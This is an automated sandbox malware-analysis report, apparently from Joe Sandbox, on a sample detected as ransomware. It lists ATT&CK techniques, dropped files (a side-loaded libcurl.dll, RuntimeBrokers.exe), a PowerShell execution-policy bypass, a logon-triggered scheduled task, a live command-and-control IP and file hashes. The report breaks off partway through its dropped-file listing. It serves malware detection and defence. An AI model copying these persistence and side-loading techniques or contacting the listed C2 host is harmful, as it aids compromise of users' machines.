Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00404FAA KiUserCallbackDispatcher,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		1
Replication Through Removable Media		1
Windows Management Instrumentation		1
Scripting		11
Process Injection		1
Masquerading		2
Input Capture		1
System Time Discovery		Remote Services2
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Modify Registry		LSASS Memory11
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Virtualization/Sandbox Evasion		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS11
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
Obfuscated Files or Information		Cached Domain Credentials11
Peripheral Device Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync2
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem37
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1581089 Sample: CnjMEmbChO.exe Startdate: 26/12/2024 Architecture: WINDOWS Score: 88 60 Suricata IDS alerts for network traffic 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 4 other signatures 2->66 9 CnjMEmbChO.exe 10 2->9         started        process3 file4 50 C:\Users\...\flashcenter_pp_ax_install_cn.exe, PE32 9->50 dropped 52 C:\Users\Public\Bilite\Axialis\libcurl.dll, PE32 9->52 dropped 54 C:\Users\Public\Bilite\...\RuntimeBrokers.exe, PE32 9->54 dropped 12 cmd.exe 1 9->12         started        process5 signatures6 68 Bypasses PowerShell execution policy 12->68 15 RuntimeBrokers.exe 3 18 12->15         started        19 conhost.exe 12->19         started        process7 dnsIp8 56 198.44.170.193, 18091, 18092, 18852 VPSQUANUS United States 15->56 44 C:\Users\user\AppData\Local\Temp\backup.exe, PE32 15->44 dropped 46 C:\Users\user\AppData\Local\Temp\backup.dll, PE32 15->46 dropped 48 C:\Users\user\AppData\Local\updated.ps1, ASCII 15->48 dropped 21 cmd.exe 1 15->21         started        23 cmd.exe 1 15->23         started        25 cmd.exe 1 15->25         started        file9 process10 process11 27 conhost.exe 21->27         started        29 tasklist.exe 1 21->29         started        31 timeout.exe 1 21->31         started        42 35 other processes 21->42 33 powershell.exe 1 23 23->33         started        36 conhost.exe 23->36         started        38 powershell.exe 39 25->38         started        40 conhost.exe 25->40         started        signatures12 58 Loading BitLocker PowerShell Module 38->58

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
CnjMEmbChO.exe50%ReversingLabsWin32.Ransomware.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\backup.dll65%ReversingLabsWin32.Trojan.DllHijack
C:\Users\user\AppData\Local\Temp\backup.exe4%ReversingLabs
C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe4%ReversingLabs
C:\Users\Public\Bilite\Axialis\libcurl.dll65%ReversingLabsWin32.Trojan.DllHijack
C:\Users\Public\Bilite\flashcenter_pp_ax_install_cn.exe11%ReversingLabsWin32.Adware.FlashHelper

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://flash.2144.com/cdm/icons/ten100.png0%Avira URL Cloudsafe
https://ion=v4.50%Avira URL Cloudsafe
http://crl.micu0%Avira URL Cloudsafe
https://flash.2144.com/cdm/icons/chn100.png0%Avira URL Cloudsafe
https://www.flash.cn/cdm/0%Avira URL Cloudsafe
https://www.flash.cn/0%Avira URL Cloudsafe
https://update-xztodolist.cqttech.com/api/v1/update/checkXZDesktopCalendarCXZUpdateModule0%Avira URL Cloudsafe
http://dump.mgr.xzdesktop.cqttech.com/api/DumpInfoStat%s_%d-%02d-%02d.log0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
http://ocsp.sectigo.com00%Avira URL Cloudsafe
https://update-xztodolist.cqttech.com/api/v1/update/check0%Avira URL Cloudsafe
https://help.2144.cn/about/duty.htm0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://pesterbdd.com/images/Pester.png4powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://dump.mgr.xzdesktop.cqttech.com/api/DumpInfoStat%s_%d-%02d-%02d.logCnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.85562793412.00000000061D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    https://sectigo.com/CPS0CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      https://www.flash.cn/CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://ocsp.sectigo.com0CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.85557142787.00000000058FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://www.flash.cn/cdm/CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Iconpowershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://update-xztodolist.cqttech.com/api/v1/update/checkXZDesktopCalendarCXZUpdateModuleCnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tCnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/Pester/Pester4powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://flash.2144.com/cdm/icons/chn100.pngCnjMEmbChO.exe, 00000000.00000003.84733438844.000000000330B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.micupowershell.exe, 0000000E.00000002.85573109453.0000000008BD5000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yCnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.85557142787.0000000005171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://ion=v4.5powershell.exe, 0000000E.00000002.85573109453.0000000008B60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://flash.2144.com/cdm/icons/ten100.pngCnjMEmbChO.exe, 00000000.00000003.84733438844.000000000330B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.85557142787.00000000052C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.85557142787.00000000058FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.85562793412.00000000061D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85566427194.00000000056F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://update-xztodolist.cqttech.com/api/v1/update/checkCnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.quovadis.bm0powershell.exe, 0000000E.00000002.85555320283.0000000003454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ocsp.quovadisoffshore.com0powershell.exe, 0000000E.00000002.85555320283.0000000003454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.85557142787.0000000005171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85558022564.0000000004691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://help.2144.cn/about/duty.htmCnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://api.flash.cn/config/getCdnValue?key=zero_dayzero_dayCnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  198.44.170.193
                                                  		unknownUnited States
                                                  		62468VPSQUANUStrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1581089
                                                  Start date and time:2024-12-26 23:11:05 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 17m 6s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                  Run name:Suspected Instruction Hammering
                                                  Number of analysed new started processes analysed:50
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:CnjMEmbChO.exe
                                                  Detection:MAL
                                                  Classification:mal88.troj.evad.winEXE@101/45@0/1
                                                  EGA Information:
                                                  • Successful, ratio: 33.3%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 54
                                                  • Number of non-executed functions: 68
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                  Warnings

                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 2480 because it is empty
                                                  • Execution Graph export aborted for target powershell.exe, PID 4836 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: CnjMEmbChO.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  17:13:52API Interceptor13238013x Sleep call for process: RuntimeBrokers.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  VPSQUANUSFqae7BLq4m.exeGet hashmaliciousUnknownBrowse
                                                  • 43.250.172.42
                                                  236236236.elfGet hashmaliciousUnknownBrowse
                                                  • 154.91.51.168
                                                  x.batGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  product.batGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  test.exeGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  Filezilla-stage2.exeGet hashmaliciousUnknownBrowse
                                                  • 103.230.121.81
                                                  rebirth.dbg.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 103.252.20.25
                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 103.122.177.128
                                                  la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 154.91.52.33
                                                  file.exeGet hashmaliciousXWormBrowse
                                                  • 103.230.121.124

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\backup.exeWiezmDFd6L.exeGet hashmaliciousUnknownBrowse
                                                    WiezmDFd6L.exeGet hashmaliciousUnknownBrowse
                                                      Fqae7BLq4m.exeGet hashmaliciousUnknownBrowse
                                                        Fqae7BLq4m.exeGet hashmaliciousUnknownBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................

                                                          C:\Users\user\AppData\Local\PolicyManagement.xml

                                                          Download File
                                                          Process:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1893
                                                          Entropy (8bit):5.212287775015203
                                                          Encrypted:false
                                                          SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                          MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                          SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                          SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                          SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24p1nqrm.ngc.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_indsnzta.55j.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb5d4zt3.nj5.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuluux0i.2aa.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oc3ocrhw.mfk.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
